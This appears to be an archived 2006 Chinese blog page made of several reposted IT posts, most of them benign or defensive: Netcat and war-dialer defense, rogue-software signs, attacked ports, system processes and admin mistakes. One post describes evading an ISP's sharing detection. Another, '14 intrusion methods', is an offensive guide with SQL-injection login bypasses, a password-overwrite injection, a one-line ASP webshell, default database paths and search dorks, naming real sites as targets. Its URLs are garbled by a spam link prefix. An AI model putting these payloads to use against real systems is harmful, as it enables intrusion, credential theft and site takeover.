对战争拨号机最有效的防范方法，是尽量避免个人电脑用Modem和主系统连接。如果因为业务需要必须连接，也应该在公司的有关部门登记，并改成“只出不进”的拨号方式。企业在这方面也必须有明确的规定。有人认为PBX使用数字式的线路，没人能私自安装Modem，实在是大错特错！因为数字Modem线很便宜也很容易买到。此外，企业也可以利用战争拨号机找出没有登记的Modem，对于没有必要的应该一律移除。

三、黑客的瑞士军刀

★网猫

网猫(Netcat)是用来进行TCP/UDP协议连接的工具，最早是由Hobbit先生在1995年为UNIX所写的程序。到了1997年，Weld Pond先生在原有基础上发扬光大，使之也可以用在NT上。虽然网猫的年纪很老(注：在IT界，半年就是一个世纪)，却老而弥坚。因为功能强大，黑客们特称之为“黑客的瑞士军刀”。

网猫的主要功能是管理系统和侦查网络的错误，然而水能载舟也能覆舟，这只猫也有入侵网络的利爪。

在主机模式里，网猫成为服务器，等待连接TCP/UDP端口，而在用户端模式，网猫可以使用户连接任何端口，这样就形成了后门。此外网猫还能扫描TCP/UDP端口。黑客经常利用它取得银行账户的资料，改金额甚至转移金钱到其它账号，当然也可以窃取其它重要信息。

☆防御Netcat 的方法

充分了解系统内所运行程序，避免让不需要的端口通过防火墙。对于外界可以接近的主机则更应该辨别所有运行程序的内容，否则很容易成为黑客入侵的渠道。另外关于主机的运行也应该有精确的日志。

四、结束语

以上就是黑客常用的入侵工具和基本的防御方法。当然黑客入侵时不会只用一种方法，而是视情况混合使用：通常黑客会先启动战争拨号器寻找没有保护的Modem，然后接管系统并扫描网络；在主机上开后门；登录到服务器上拦截信息，进而控制服务器；再攻击其他的网站。

黑客入侵事件一再发生，使得人们开始怀疑系统安全人员的能力，很多优秀的人才因而被炒了鱿鱼，其实这很不公平。从工作目的上看，一般的工程或管理人员工作的内涵是要“使一些事发生”，而系统安全人员的首要任务却是“要让某些事不发生”，从逻辑上讲，这是个更为困难的差事。

类别：无分类 | 评论(0) | 浏览(8038) | 收藏

2006年11月27日 05:40:05

破解电信禁止路由上网的方法

·判断用户是否是共享上网

　　ADSL共享上网有两种方式，一种是代理，一种是地址翻译（NAT），大家常说的路由方式其实就是NAT方式，其实路由和NAT的原理还是有区别的，这里不作讨论，现在的ADSL猫一般都有NAT的功能，用它本身的功能实现共享上网是比经济方便，本文主要讨论这种方式。

　　要想阻断一台以上的计算机上网必须能发现共享后边的机器是否多于一台，NAT的工作原理如图一所示，经过NAT转换后访问外网的内网的计算机的地址都变成了192.168.0.1而且MAC地址也转换成了ADSL的MAC地址，也就是说，从原理上讲，直接在ADSL出口抓经过NAT转换的包是不能发现到底有几台机器在上网。那是如何发现的呢？经过研究发现它是采用多种方法探测用户是否用共享方式上网，从而进行限制，下面分别进行破解：

一、检查同一IP地址的数据包中是否有不同的MAC地址，如果是，则判定用户共享上网

　　破解的办法是把每台机的MAC地址改为一样。修改的方法如下:

　　首先要获取本机的MAC：MAC地址是固化在网卡上串行EEPROM中的物理地址，通常有48位长。以太网交换机根据某条信息包头中的MAC源地址和MAC目的地址实现包的交换和传递。

　　在Windows 2000/XP中，依次单击“开始”→“运行”→输入“CMD”，回车后输入“ipconfig /all”→回车。或者右键本地连接图标、选择状态然后点击支持选项卡，这里“详细信息”中包含有MAC和其它重要网络参数。

　　1.如果你的网卡驱动有直接提供克隆MAC地址功能，如RealTek公司出的RTL8139芯片，那恭喜你了，点击“开始→设置→控制面板”，双击“网络和拨号连接”，右键点击需要修改MAC地址的网卡图标，并选择“属性”。

　　在“常规”选项卡中，点击“配置”按钮，点击“高级”选项卡。在“属性” 区，你应该可以看到一个称作“Network Address”或“Locally Administered Address”的项目，点击它，在右侧“值”的下方，输入你要指定的MAC地址值。要连续输入12个数字或字母，不要在其间输入“-”。重新启动一次系统后设置就会生效了（Windows 98和Windows 2000/XP用户操作略有区别，请参照系统说明操作）

　　2.以Windows XP系统为例，如果你的网卡驱动没有提供克隆MAC地址功能，请按如下的方法：

　　大部分网卡都可以通过在控制面板中修改网卡属性来更改其MAC地址。在“设备管理器中”，右键点击需要修改MAC地址的网卡图标，并选择“属性/ 高级”选项卡。在“属性”区，就可以看到一个称作“Network Address”或其他相类似名字的的项目，点击它，在右侧“值”的下方，输入要指定的MAC地址值。要连续输入12个十六进制数字或字母，不要在其间输入“-”。

　　另外有几个可以修改MAC的软件都可以在Windows XP/2000下运行，所以这里就不详细介绍了

　　小贴士：
　　如果你想把网卡的MAC地址恢复原样，只要再次把“Network Address”项右边的单选项选择为下面一个“没有显示”再重新启动即可（Windows 2000是“不存在”）。

·通过简单网络管理协议发现多机共享上网

二、通过SNMP（简单网络管理协议）来发现多机共享上网

　　有些路由器和ADSL猫内置SNMP服务，通过扫描软件（ipscan、 superscan......）扫描一下，发现开着161端口，161是SNMP（简单网络管理协议）的服务端口，难道是通过SNMP协议发现的主机数量，用xscan对猫进行了漏洞扫描，果然有默认密码，登录到猫的管理界面但是找不到关闭SNMP服务的地方，看来是留的后门，由此基本可断定是通过 SNMP协议发现的主机数。

解决办法：

　　1.如果该猫可以关闭SNMP协议，那就把SNMP用的161端口禁止就行了.使用路由器或打开ADSL猫的路由模式共享上网的朋友可以进入管理界面有关闭SNMP选项的关掉它。

　　如果猫的管理界面无关闭SNMP选项的只好买一个没有SNMP服务的路由器，例如TP-LINK TL-R400，放到adsl moden和hub中间，如下图.在该路由器中再做一个NAT服务，这样进到ADSL猫中的就是一个地址，这样就解决了共享上网。注意在路由器中要关闭SNMP协议。

　　2.修改配置文件，可以将配置转换成一个文件，用二进制编辑工具修改默认密码，然后再加载到猫中(这只是一种思路，没有试过）。

·监测并发端口&借助网络尖兵

三、监测并发的端口数，并发端口多于设定数判定为共享

　　这是一个令人哭笑不得的设定，“网络尖兵”不停扫描用户打开的端口数，多于设定值的就判断是共享，有时连按几次F5键它是认为是共享，连单用户上网也受到了影响，这个就没法破解了（除非你把网络尖兵黑了），俺这里的解决办法是装成无辜的用户到ISP的客服电话大骂，并声明搞不好就换ISP，一会儿网络就正常了。

四、网络尖兵

　　网络尖兵使用了未知的方法从共享的计算机中探测到共享的信息，目前解决的办法是所有共享的客户机均要安装防火墙，把安全的级别设为最高，因条件有限，只试用了几种防火墙，发觉“金山网镖V”有用，把IP配置规则里面所有的允许别人访问本机规则统统不要，比如不要允许Ping本机，防止ICMP、IGMP攻击也要勾选。如果是Windows XP，要打开网卡的网络防火墙。

　　采取以上破解的办法后，在自己的局域网不能看到本机，而且Windows XP打开网卡的网络防火墙后，在QQ不能传送文件，网速有所减慢，但总算又可以共享了，如果有好的办法，也请大家告知。

　　总的来说，“网络尖兵”还是一个不成熟的产品，主要是他对单用户上网也产生影响，浏览网页经常要刷新几次，有的网页比较复杂，要调用几个服务器文件时它也当你是共享，造成网页部分不能显示。并且由于“网络尖兵”不停扫描用户端口占用带宽，导致网速变慢。

类别：无分类 | 评论(0) | 浏览(7735) | 收藏

2006年11月27日 05:36:15

教你几招判断你的系统是否被流氓侵犯

江湖规矩“人不犯我，我不犯人”，但是流氓软件并不遵守这条规矩，它们唯恐无法入侵，一旦有机会，你便被其缠身。流氓软件的龙头大哥──3721就采取了“无孔不入”的手段，不管你是在安装软件、浏览网站时它都会在用户不知情的情况下伺机入驻电脑中。那么，如何才能知道自己的电脑是否招流氓了呢？

1.根据表象初步判断

医生判断一个病人是否感冒了，可以从是否流鼻涕，是否鼻塞、是否附带咳嗽等表象进行判断，而要想判断系统是否感染了流氓软件，也可以从表象来判断。当系统感染了流氓软件后一般有以下几种可疑迹象可以通过感觉来判断：

① 系统运行速度越来越慢

安装了病毒防火墙，系统中最近也并没安装什么软件，但是系统的运行速度一天比一天慢，而杀毒软件也没有进行病毒警告，这种情况下，十之八九中了流氓软件的招。

② 部分软件（特别是浏览器）设置被强行修改

由于流氓软件表面上是为用户提供了一些有用的功能，但实质上，它们是为了达到宣传自己的网站、自己的产品等目的。因此，流氓软件一旦成功入侵电脑，它们便会在一些软件上提供相应的插件工具栏，以浏览器类软件居多，在浏览器家族中又以IE最受流氓软件欢迎。当发现日常使用的软件的工具栏被增加了一些项目或是像浏览器的设置被修改了，也足可以说明系统中可能感染了流氓软件。

③ 自动弹出广告窗口

在正常使用电脑过程中，时而不时地自动弹出一些广告窗口，关闭后隔一断时间又会出现，做广告本是流氓软件的一个目的，因此，当你频繁地看到自动弹出的广告时，系统也有可能感染了流氓软件。

④ 自动打开网站

与自动弹出广告类似，有些流氓软件更猖狂，会自动启动浏览器并打开一些网站，如果你遇到了这种情况也说明系统有招流氓软件的迹象了。

2.利用工具检测

根据表象判断只是精略地推断是否感染流氓软件，就像医生给病毒看病一样，先是通过询问等方式来大致地判断病情，最后还会使用相关的医疗机器进行确诊。判断系统是否招流氓软件也应该通过工具来“确诊”。

① 使用系统的任务管理器

当系统感染了流氓软件后，只要流氓软件正在运行的话，一般都是可以通过系统的任务管理器来寻觅其踪影：

按下“Ctrl+Shift+Esc”打开任务管理器窗口，再单击“进程”选项卡，在进程列表中将会看到流氓软件的踪影了。不过，这种方法只适合那些对电脑系统比较熟悉并对流氓软件对应的进程有所了解的朋友们采用。

② 使用专用检测工具

使用任务管理器这个系统自带的工具来检测流氓软件对用户的要求相对高些，为此，笔者推荐大多数用户使用专业的流氓软件检测工具来检测，这样既直观，操作也会方便很多。

现在检测流氓软件的工具有不少，例如：超级兔子、Upiea、恶意软件清理助手、360安全卫士、Windows Defender等。而流氓软件检测数目要数360安全卫士最多。

类别：无分类 | 评论(0) | 浏览(7547) | 收藏

2006年11月27日 05:34:04

黑客扫描十种最易受攻击端口

如今，网络上的黑客攻击已经成了家常便饭，自动攻击和计算机蠕虫病毒正以闪电般的速度在网络上蔓延。今年7月10日到7月23日，Tel Aviv大学的开放端口就曾经被扫描达96000次，它抵挡了来自99个国家，82000名黑客枪林弹雨般的攻击。就此，ForeScout公司开发了一种叫做ActiveScout的防入侵技术，它有助于查明黑客的企图并防止网络攻击。据它观测，现在具有黑客行为的攻击与扫描具有以下特征：

约90%的攻击来自蠕虫

由于蠕虫病毒具有自动攻击和快速繁殖的特性，因此，它占网络攻击的大约90%，通常是系统扫描或同步攻击。其中，大部分网络攻击的来源地是美国。根据ActiveScout的数据，这些蠕虫病毒繁殖迅速，扫描和攻击相隔的时间很短，因此无法人为控制。蠕虫病毒也具有反复攻击的特性，它们会寻找同一端口并大规模入侵这些端口。如果人们不对蠕虫病毒采取防范措施，攻击/扫描的成功率将达到30%，即在10次扫描中，有3次能获得结果并可进行攻击。

96%的扫描集中在端口

端口扫描在网络扫描中大约占了96%，UDP（User Datagram Protocol）服务次之，占3.7%。除了这两种之外，剩余的0.3%是用户名和密码扫描、NetBIOS域登录信息和SNMP管理数据等。Tel Aviv大学已经开始努力防止蠕虫攻击和对NetBIOS弱点的网络攻击，因为这些攻击可能会感染所有的Windows系统。同时，在发送流量之前，要求ISP对所有的NetBIOS流量进行过滤。

有调查表明：在过去的半年中，存在危险性的Internet流量数量已经增加了2倍；暗噪声主要是由网络探测引起的，45%到55%的可疑行为都是黑客对计算机的扫描造成的；大多数攻击都是自动的，小型程序攻击通常来自以前中毒的计算机；黑客攻击这些网络的主要原因是寻找他们能用来传播垃圾邮件、为非法文件寻找特别存储空间的计算机，或者占用可用于下一次攻击的机器。

10种端口最易受攻击

某组织I-Trap曾经收集了来自24个防火墙12小时工作的数据，这些防火墙分别位于美国俄亥俄州24个企业内网和本地ISP所提供的Internet主干网之间。其间，黑客攻击端口的事件有12000次之多，下表是攻击的详细情况。

　　
端口号服务攻击事件数说明

135和445 windows rpc 分别为42次和457次表明可能感染了最新的windows病毒或蠕虫病毒
57 email 56次黑客利用fx工具对这个端口进行扫描，寻找微软web服务器的弱点
1080，3128，6588，8080 代理服务分别为64、21、21、163次表示黑客正在进行扫描
25 smtp服务 56次是黑客探测smtp服务器并发送垃圾邮件的信号
10000＋未注册的服务 376次攻击这些端口通常会返回流量，原因可能是计算机或防火墙配置不当，
或者黑客模拟返回流量进行攻击
161 snmp服务 937次成功获得snmp可能会使黑客完全控制路由器、防火墙或交换机
1433 微软sql服务 147次表明计算机可能已经感染了sql slammer蠕虫病毒
53 dns 1797次表明防火墙或lan配置可能有问题
67 引导程序 23次表明设备可能配置不当
2847 诺顿反病毒服务 55次表明计算机存在设置问题

类别：无分类 | 评论(2) | 浏览(7245) | 收藏

2006年11月27日 05:32:01

改系统注册表实现Windows XP自动登录

每次进入Windows XP桌面前，总会出现一个用户登录的画面，要求输入用户名和密码。这样做的好处是在多人使用一部电脑的环境中安全性有保障。不过，如果电脑只是你一个人使用，每次都必须输入密码，实在是令人讨厌。要取消这个登录步骤，可以通过修改注册表文件中的Winlogon项目来实现。但在修改之前有必要提醒大家，这样做的后果是你的密码会以纯文本的形式存放于注册表文件中。换句话说，只要有人能够打开你的注册表文件，那他就会知道你的登录密码。了解这些情况后，如果仍想改动的话，可按以下步骤操作:

第1步:运行注册表编辑器，依次展开[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ]分支，然后在右侧窗口双击“DefaultUserName”，接着输入你的登录用户名。如果没有预设的用户名称，可以在注册表编辑器的菜单栏点选“编辑→新建→字符串值(s)→DefaultUserName”来添加这个项目，注意要区分大小写字母。

第2步:同样在该分支下，在注册表编辑器的右侧窗口中双击“DefaultPassword”，然后在空白栏内输入你的密码。假如未发现“DefaultPassword”一项，可按上面的步骤来新建该字符串值。

第3步:接下来在右侧窗口中双击“AutoAdminLogon”，将数值设置为“1”。假如未发现“AutoAdminLogon”，可按上面的步骤来新建。

现在关闭注册表编辑器并重新启动电脑，以后你会发现那个令人讨厌的登录对话框不见了。

类别：无分类 | 评论(0) | 浏览(7201) | 收藏

2006年11月27日 05:31:01

网管员牢记十种较为常见服务器管理错误

网络管理阶层的工作就是保证网络的正常工作，从而使得职工们的工作不被打断。可问题在于事物并非总是按照理想状况发展，事实上经常会出现平地起风波的状况。其间有许多原因，这里我们只讨论10种较为常见的网管错误。　　

1.UPS(不间断电源)的使用问题　　

某商店正在压榨它的网络系统的最后生命。尽管那台很老的服务器几乎难以满足商店运营的需要，但经营者甚至连更换UPS中的电池都不愿意，事实上电池每两年就应该更换一次。终于有一天突然停电了，而这个UPS实在是太老了，它已经不能控制服务器安全关机了。电池能量大部分早已耗尽，所以它也很快没电了。结果，防控异常情况的控制器没能起到正常关闭服务器的作用。商店每日的正常运转和交易事宜全靠这个服务器。修复服务器花了三天时间，而弥补由此带来的损失需要花费更长时间。事实上，一个价值仅75美元的电池就能有效避免上述事情的发生。　　

2.没有整理好所需要的东西　　

一个电话打进公司总部说某个分公司的服务器出了问题，网络管理员飞奔出办公室，驱车一小时到达出事地点。结果，他发现操作系统文件被毁坏了一部分，这样，他所有能做的只有重新安装操作系统。该分公司的网络管理员一时找不到安装盘，没关系，这位总部的管理员有，不过在他的办公室里――离这里单程一小时、往返两小时。收拾好一个背包，随身带着。所有你可能需要的东西，包括你的用户所使用的操作系统备份，都应该在背包里放着。这是很容易做到的，不需要花费些什么，但在更新操作系统之类的问题上能起到关键性作用。　　

3.没有安装补丁　　

一个玩具制造商的服务器连接出了问题，使得全体职员与自己的文件都失去了联系，生产被迫停止两天。损失严重!一位新近被雇的网络管理员负责解决这个危机。他很快发现以前的网络管理员在三年前安装系统的时候没有安装补丁。　　

补丁是免费提供的，也许它们不是开放式的，但它们通常是很容易配置，任何一个系统管理员都能够做到。之前的那位管理员说，因为系统运行得很好，所以不需要打补丁。这种说法显然是很不负责任的。　　

4.备份工作不当　　

某医院办公室存储了很多医药文件和病历的服务器出了故障。因为服务器上没有信息可以被存取，办公室的各项运转基本停止。网络管理员立即拿出一个备份文档的带子，试图修复。当她发现这个带子是空的时，心沉了下去。她检查了另外的备份带子，居然全是空的!她检查了办公室的日志，发现同僚们两年来每天都更换备份带，只是带子被放进从来没有安装备份软件的服务器里，没有人知道备份带有问题，因为从来没有人检查过，而只是两年内坚持每天更换空白备份带。这件事使医院损失惨重。其实只要任何一个数据库管理员做一个简单的备份检查就可以避免这种重大问题的发生了。事实上，他们正在这样做，每天都是。　

5.劣质的电缆线路工程　　

一个银行的网络经常出问题，为此他们专门对配线箱做了检查，检查中发现，许多RJ-11和RJ-12的插头插进了RJ-45插座之内。而且在每一个插座里都插入了一根牙签，这样布的电缆线路难怪会出问题。许多网络问题都归咎于不合适的电缆线路连接，所以，精明的管理者最好让有经营许可证的、有担保的并且信得过的电缆线路承包商来架接电缆线路。　　

6.设备转手次数太多，内部构成出问题　　

一项专业的运动团体买了一个名牌服务器，但是它刚开始工作时就出问题。该网络管理员向操作系统厂商和硬件厂商提出帮助请求。后来发现，提供这个“名牌”服务器的转售商人给这个服务器配置的是非名牌的内存、非名牌的磁盘控制器，以及非名牌的外置磁盘驱动器，只因为这些组件要便宜一些。该硬件厂商和操作系统厂商拒绝提供支持，因为服务器被一些非名牌的构件所混淆，其结构不易被鉴定。　　

7.没有签订授权合同　　

某办公室去年花费大量现金采购了服务器。该系统有RAID 5的冗余保护,双电源和24×7支持，而一年之后，驱动器坏掉了。保证24×7支持的工作人员来了，他打电话给硬件厂商，厂商问他合约号码是什么，而该办公室之前并没有签订授权合同。“没关系，”厂商说，“他们离授权到期还有两年时间，我将在五六天内给你更换驱动器。” 　　

但是，厂商的宽容是远远不够的，最好保证你有全套24×7支持，去一个办公用品商店买标签，在每个标签上写上授权合同号码和技术支持的电话号码，然后把它们贴在每一台机器上。
8.没有建立测试环境　　

几年以前，一家软件发展公司安装了一个新的工作站，它用的是最快的随机存取储存器，最快的硬盘驱动器和最快速的处理器，它将作为董事长的新工作站。在安装完成后不久，这位董事长接受了来自他最大的合伙人公司的一个请求，用它来测试新的人造宇宙站的通信平台，其结果是蓝屏。当他惊讶之余重新起动计算机时，内部保存的信息什么都没有了。在重建系统之后，他又花了四天时间才从那一堆操作指南中摆脱出来。　　

另外一家公司的董事长比较聪明，建造了一个测试网络。在系统升级之前，他们会在测试网络上做做试验，一次又一次地找出错误,反复设定网络不断试验,直到它完全正确。只有在试验结果完全正确地情况下，他们才会真正展开系统升级。　　

第一个公司的董事长再也不把自己的服务器当测试仪用了。　　

9.存储容量计划不周　　

某艺术公司五年前买服务器的时候，该服务器可以支持六个8G-byte RAID Array 5驱动器。为了要节省钱，公司坚持只买四个4G-byte驱动器。网络管理员说,不久他们会需要较多的空间，公司最终妥协了，多买了两个驱动器，如此了结了此事。在三年之后他们出现了严重的空间不足问题,他们甚至不得不删除只有50K byte的小文件。他们急需扩大容量，而当时8G-byte的驱动器已经买不到了，更大的服务器又支持不了。而能解决该问题的一个新的额外子系统将需要比原服务器更多的钱。这样，他们只得比计划的提前两年更换服务器。因此，做好存储容量计划，会使你节约开支，甚至可能大大延长你的系统寿命。　　

10.错误操作是最大的隐患　　

下午办公室的电源突然断掉了，紧张的办公室经理认为这会损害他们的两个服务器，因此他采取了快速行动――他走过去把服务器都关掉了。回家时，他还为他的快速行动而自豪。可第二天早晨,当他回到办公室打开两个服务器时，发现里面内容什么都没有了。事实上，昨天当他按下服务器开关时，服务器正在进行关键文件的复杂更新工作，他中止一台服务器的工作时影响了另一台服务器关键性数据库的存盘。结果修复网络工作花了两天时间。　　

在所有保护网络工作的问题中，这种情况是最不可预知的。因此，必须提高网络使用者的技术素质。

类别：无分类 | 评论(0) | 浏览(6775) | 收藏

2006年11月27日 05:29:54

系统进程全攻略

最基本的系统进程（也就是说，这些进程是系统运行的基本条件，有了这些进程，系统就能正常运行）:

smss.exe Session Manager

csrss.exe 子系统服务器进程

winlogon.exe 管理用户登录

services.exe 包含很多系统服务

lsass.exe 管理 IP 安全策略以及启动 ISAKMP/Oakley (IKE) 和 IP 安全驱动程序。(系统服务)

产生会话密钥以及授予用于交互式客户/服务器验证的服务凭据(ticket)。(系统服务)

svchost.exe 包含很多系统服务

svchost.exe

SPOOLSV.EXE 将文件加载到内存中以便迟后打印。(系统服务)

explorer.exe 资源管理器

internat.exe 托盘区的拼音图标

附加的系统进程（这些进程不是必要的，你可以根据需要通过服务管理器来增加或减少）:

mstask.exe 允许程序在指定时间运行。(系统服务)

regsvc.exe 允许远程注册表操作。(系统服务)

winmgmt.exe 提供系统管理信息(系统服务)。

inetinfo.exe 通过 Internet 信息服务的管理单元提供 FTP 连接和管理。(系统服务)

tlntsvr.exe 允许远程用户登录到系统并且使用命令行运行控制台程序。(系统服务)

允许通过 Internet 信息服务的管理单元管理 Web 和 FTP 服务。(系统服务)

tftpd.exe 实现 TFTP Internet 标准。该标准不要求用户名和密码。远程安装服务的一部分。(系统服务)

termsrv.exe 提供多会话环境允许客户端设备访问虚拟的 Windows 2000 Professional 桌面会话以及运行在服务器上的基于 Windows 的程序。(系统服务)

dns.exe 应答对域名系统(DNS)名称的查询和更新请求。(系统服务)

以下服务很少会用到，上面的服务都对安全有害，如果不是必要的应该关掉

tcpsvcs.exe 提供在 PXE 可远程启动客户计算机上远程安装 Windows 2000 Professional 的能力。(系统服务)

支持以下 TCP/IP 服务：Character Generator, Daytime, Discard, Echo, 以及 Quote of the Day。(系统服务)

ismserv.exe 允许在 Windows Advanced Server 站点间发送和接收消息。(系统服务)

ups.exe 管理连接到计算机的不间断电源(UPS)。(系统服务)

wins.exe 为注册和解析 NetBIOS 型名称的 TCP/IP 客户提供 NetBIOS 名称服务。(系统服务)

llssrv.exe License Logging Service(system service)

ntfrs.exe 在多个服务器间维护文件目录内容的文件同步。(系统服务)

RsSub.exe 控制用来远程储存数据的媒体。(系统服务)

locator.exe 管理 RPC 名称服务数据库。(系统服务)

lserver.exe 注册客户端许可证。(系统服务)

dfssvc.exe 管理分布于局域网或广域网的逻辑卷。(系统服务)

clipsrv.exe 支持“剪贴簿查看器”，以便可以从远程剪贴簿查阅剪贴页面。(系统服务)

msdtc.exe 并列事务，是分布于两个以上的数据库，消息队列，文件系统，或其它事务保护资源管理器。(系统服务)

faxsvc.exe 帮助您发送和接收传真。(系统服务)

cisvc.exe Indexing Service(system service)

dmadmin.exe 磁盘管理请求的系统管理服务。(系统服务)

mnmsrvc.exe 允许有权限的用户使用 NetMeeting 远程访问 Windows 桌面。(系统服务)

netdde.exe 提供动态数据交换 (DDE) 的网络传输和安全特性。(系统服务)

smlogsvc.exe 配置性能日志和警报。(系统服务)

rsvp.exe 为依赖质量服务(QoS)的程序和控制应用程序提供网络信号和本地通信控制安装功能。(系统服务)

RsEng.exe 协调用来储存不常用数据的服务和管理工具。(系统服务)

RsFsa.exe 管理远程储存的文件的操作。(系统服务)

grovel.exe 扫描零备份存储(SIS)卷上的重复文件，并且将重复文件指向一个数据存储点，以节省磁盘空间。(系统服务)

SCardSvr.exe 对插入在计算机智能卡阅读器中的智能卡进行管理和访问控制。(系统服务)

snmp.exe 包含代理程序可以监视网络设备的活动并且向网络控制台工作站汇报。(系统服务)

snmptrap.exe 接收由本地或远程 SNMP 代理程序产生的陷阱消息，然后将消息传递到运行在这台计算机上 SNMP 管理程序。(系统服务)

UtilMan.exe 从一个窗口中启动和配置辅助工具。(系统服务)

msiexec.exe 依据 .MSI 文件中包含的命令来安装、修复以及删除软件。(系统服务)

类别：无分类 | 评论(0) | 浏览(6993) | 收藏

2006年11月27日 05:16:31

特大淫秽色情网站情色六月天主犯被判无期

据新华社电太原市中级人民法院22日依法对轰动全国的“华人第一成人社区”特大淫秽色情网站案一审公开宣判，主犯被告人陈辉被判处无期徒刑，剥夺政治权利终身，并处没收个人财产10万元；其他8名被告人分别被判处有期徒刑10年至1年1个月。

　　法院经审理查明，被告人陈辉，男，出生于福建省建阳市，小学文化程度。2004年，他利用租用的美国服务器从他人处接收了“情色六月天”网站，2005年先后建立了“情色海岸线论坛”网站、“天上人间-中华伊甸园论坛”网站、“华人伊甸园论坛”网站，并利用上述网站发布含有淫秽内容的电影、图片和文章等淫秽电子信息。

　　上述4个淫秽网站管理人员按级别分为“论坛管理员”“超级版主”和“版主”，采取等级积分的方式管理会员，网站会员只有积分达到一定等级才有相应的阅读权限。被告人陈辉通过网络先后结识了被告人付秋、虞懿等人，并将其招募为论坛管理员，后又通过被告人付秋、虞懿等人将被告人曾铮、梁庆伟等人招募为网站的各级管理人员，负责或者参与网站的日常管理、维护工作。在被告人陈辉等人的共同管理、维护下，上述淫秽网站的规模不断扩大，注册会员不断增加。经远程勘验，截至2005年10月3日2时，上述4个网站共注册会员60余万人，累计点击数达1100余万次。

　　通过经营淫秽网站，被告人陈辉等人非法获利20余万元，其中，被告人陈辉获利10余万元。

　　法院认为，被告人陈辉以牟利为目的，通过租用他人的服务器，开办淫秽网站；被告人付秋、虞懿共同利用互联网传播淫秽电子信息以获取非法利益；被告人张斌在明知被告人陈辉等人实施上述行为，将其租用的服务器转租并维护，供“情色六月天”网站使用以非法获利；被告人曾铮、梁庆伟等人参与网站管理，虽不获取经济利益，但实施管理、维护网站的行为，属于共同犯罪行为，上述被告人的行为均构成传播淫秽物品牟利罪，公诉机关指控罪名成立。

类别：无分类 | 评论(0) | 浏览(7771) | 收藏

2006年11月27日 05:14:04

网络入侵的14种可利用方法

1.上传漏洞[不多讲]

pS: 如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”，80%就有漏洞了！

有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传.

2.注入漏洞[不多讲]

pS:对MD5密码.有时我们不是哪么容易跑出来.如果是[SQL数据库].那么我们可以用以下命令:

http://www.sms55.cn/reg.htm注入网址;update admin set password=’新MD5密码’ where password=’旧MD5密码’-- [admin为表名.]

3.旁注,也就是跨站.

我们入侵某站时可能这个站坚固的无懈可击，我们可以找下和这个站同一服务器的站点，然后在利用这个站点用提权，嗅探等方法来入侵我们要入侵的站点。，在这里有个难点，就是一些服务器的绝对路径经过加密，这就看我们的本事了

4.暴库:把二级目录中间的/换成%5c

EY:http://www.sms55.cn/reg.htmwww.ahttc.edu.cn/otherweb ... s.asp?BigClassName=职责范围&BigClassType=1

如果你能看到：’E:\ahttc040901\otherweb\dz\database\iXuEr_Studio.asa’不是一个有效的路径。确定路径名称拼写是否正确，以及是否连接到文件存放的服务器。

这样的就是数据库了。下载时用FLASHGET换成.MDB格式的就行.

5.’or’=’or’这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有：

’or’’=’ " or "a"="a ’) or (’a’=’a ") or ("a"="a or 1=1-- ’ or ’a’=’a

6.社会工程学。这个我们都知道吧。就是猜解。

ＥＹ：http://www.sms55.cn/reg.htmwww.neu.edu.cn/waishi/admin

admin waishi

７.写入ASP格式数据库。就是一句话木马[〈%execute request("value")%〉 ]，常用在留言本.

ＥＹ：http://www.sms55.cn/reg.htmwww.ahsdxy.ah.edu.cn/ebook/db/ebook.asp[这个就是ASP格式的数据库]，再写入一句话木马

8.源码利用：一些网站用的都是网上下载的源码.有的站长很菜.什么也不改.

EY:http://www.sms55.cn/reg.htmwww.ahsdxy.ah.edu.cn/xiaoyoulu/index.asp

这个站用的是：杰出校友录，源码我下过了，

默认数据库/webshell路径：\database\liangu_data.mdb 后台管理：adm_login.asp 密码及用户名都是admin

9.默认数据库/webshell路径利用:这样的网站很多/利人别人的WEBSHELL.

/Databackup/dvbbs7.MDB

/bbs/Databackup/dvbbs7.MDB

/bbs/Data/dvbbs7.MDB

/data/dvbbs7.mdb

/bbs/diy.asp

/diy.asp

/bbs/cmd.asp

/bbs/cmd.exe

/bbs/s-u.exe

/bbs/servu.exe

工具：网站猎手挖掘鸡

EY：http://www.sms55.cn/reg.htmwww.cl1999.com/bbs/Databackup/dvbbs7.MDB

10.查看目录法:人一些网站可以断开目录，可以方问目录。

EY：http://www.sms55.cn/reg.htmwww.ujs168.com/shop/admin/

http://www.sms55.cn/reg.htmescolourfvl.com/babyfox/admin/%23bb%23dedsed2s/

这样我们可以找到数据库，下载不用我教吧

11.工具溢出:.asp?NewsID= /2j.asp?id=18 .asp?id=[这种方法可以取得大量的WEBSHELL]

12.搜索引擎利用:

(1).inurl:flasher_list.asp 默认数据库:database/flash.mdb 后台/manager/

(2).找网站的管理后台地址:

site:xxxx.comintext:管理

site:xxxx.comintitle:管理〈关键字很多，自已找〉

site:xxxx.cominurl:login

(3).查找access的数据库,mssql、mysql的连接文件

allinurl:bbsdata

filetype:mdbinurl:database

filetype:incconn

inurl:datafiletype:mdb

我主不做了。。自已做做吧。。

13.COOKIE诈骗：把自己的ID修改成管理员的，MD5密码也修改成他的，用桂林老兵工具可以修改COOKIE。这个我就不多讲了

14.利用常见的漏洞：如动网BBS

EY：http://www.sms55.cn/reg.htmjs1011.com/bbs/index.asp

可以先用:dvbbs权限提升工具，使自已成为前台管理员。

THEN，运用:动网固顶贴工具，找个固顶贴，再取得COOKIES，这个要你自已做。我们可以用WSockExpert取得Cookies/NC包

这个我就不做了，网上教程多的是，自已下个看看。

工具：dvbbs权限提升工具动网固顶贴工具

15.还有一些老漏洞。如IIS3，4的查看源码，5的DELETE

CGI，PHP的一些老洞，我就不说了啊。。太老了。没有什么大用途。

类别：无分类 | 评论(0) | 浏览(7235) | 收藏

2006年11月27日 04:07:04

谁见过如此经典的~~~~~~~~~~~~~~~~~~~~~

注意！！但凡看完此文不评论者不但这辈会打光棍,就连下辈子也要打

1、你是我的第一个男人
2、从后面抱着我睡觉，我乖乖地蜷成一团，不转过去看你
3、半夜醒来的时候替你掖好被子
4、吃你喂给我的你认为好吃的东西，并且也觉得好吃
5、不打听你不想我知道的任何事情
6、相信你的每一句话，不揭穿你的谎言
7、努力适应你的生活方式和生活的圈子
8、友好地对待你的朋友，把他们也当作是自己的朋友
9、在你的朋友面前给足你面子
10、继续做你喜欢我做的工作
11、把头发留长，不烫卷，不使用者哩水等让头发变硬的东东
12、控制饮食和锻炼身体，以保持身材的苗条和改变太平公主的现状
